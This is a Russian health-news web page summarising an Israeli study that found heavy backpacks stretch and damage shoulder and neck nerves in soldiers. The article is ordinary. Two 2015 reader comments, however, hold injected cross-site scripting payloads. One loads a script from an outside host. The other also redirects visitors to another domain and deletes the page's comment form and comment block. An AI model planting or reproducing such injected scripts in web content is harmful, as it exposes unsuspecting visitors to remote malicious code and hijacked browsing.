Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что удобнее: рюкзак или п...  >>  Что удобнее: рюкзак или портфель? Неважно! Тяжелый рюкзак разрушает нервы и мышцы!
 
Обратная связь
 

Что удобнее: рюкзак или портфель? Неважно! Тяжелый рюкзак разрушает нервы и мышцы!

Размер шрифта
02 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Израильские ученые доказали, что ношение тяжелых рюкзаков ведет к повреждению нервов шеи и плеч, которые иннервируют руки и пальцы.

В исследовании приняли участие солдаты, которым приходится носить тяжелые рюкзаки. Солдаты жаловались не только на дискомфорт и боль в области плеч, но и на покалывание и онемение пальцев рук. Для неинвазивного изучения структуры тканей ученые использовали методы биомеханического анализа, изначально разработанные для исследования хронических ран. Данный анализ позволяет судить о том, как механическая нагрузка в зависимости от силы и точки приложения вызывает повреждение кожи и внутренних органов.

Используя базу данных, ученые создали анатомические компьютерные модели плеч. С помощью них можно моделировать распределение давления на кожу и плечевое сплетение, а также определять расположение сосудов и нервов в чувствительных областях, подверженных повреждению.

«Ношение тяжелого рюкзака приводит к растяжению нервов, что сопровождается уменьшением скорости проведения электрических импульсов и появлением соответствующих симптомов», – поясняет профессор Амит Гефен из Тель-Авивского университета.

Полученные результаты применимы и для обычных людей, которым приходится носить рюкзак. В дальнейшем ученые планируют продолжить исследование, чтобы оценить влияние нагрузки на проводимость нервов и опорно-двигательную систему детей.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вся правда о каблуках   Когда вы нервничаете, ваш ребенок толстеет   Подростки не могут побороть страх   Акция «Быстрее боли» в рамках полумарафона «Такеда Осенний гром»  
01 мая 2013Что удобнее: рюкзак или портфель? Неважно! Тяжелый рюкзак разрушает нервы и мышцы! 02 июля 2013Лечить головную боль можно без лекарств! Ученые подключают электричество к нервам!
 
24 мая 2013Ученые сошли сума! Они доказали, что компьютерные игры стимулируют чтение! 17 мая 2013Пол вашего ребенка влияет на продолжительность жизни! Кого рожать, чтобы прожить дольше?
 

Слайдшоу

1
Миостимулятор OMRON E4
Миостимулятор OMRON E2
Привычки, которые убивают вашу спину

Тесты

1
Что вы знаете о грудном вскармливании?
Что вы знаете о мышцах?
Знаете ли вы свой язык
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.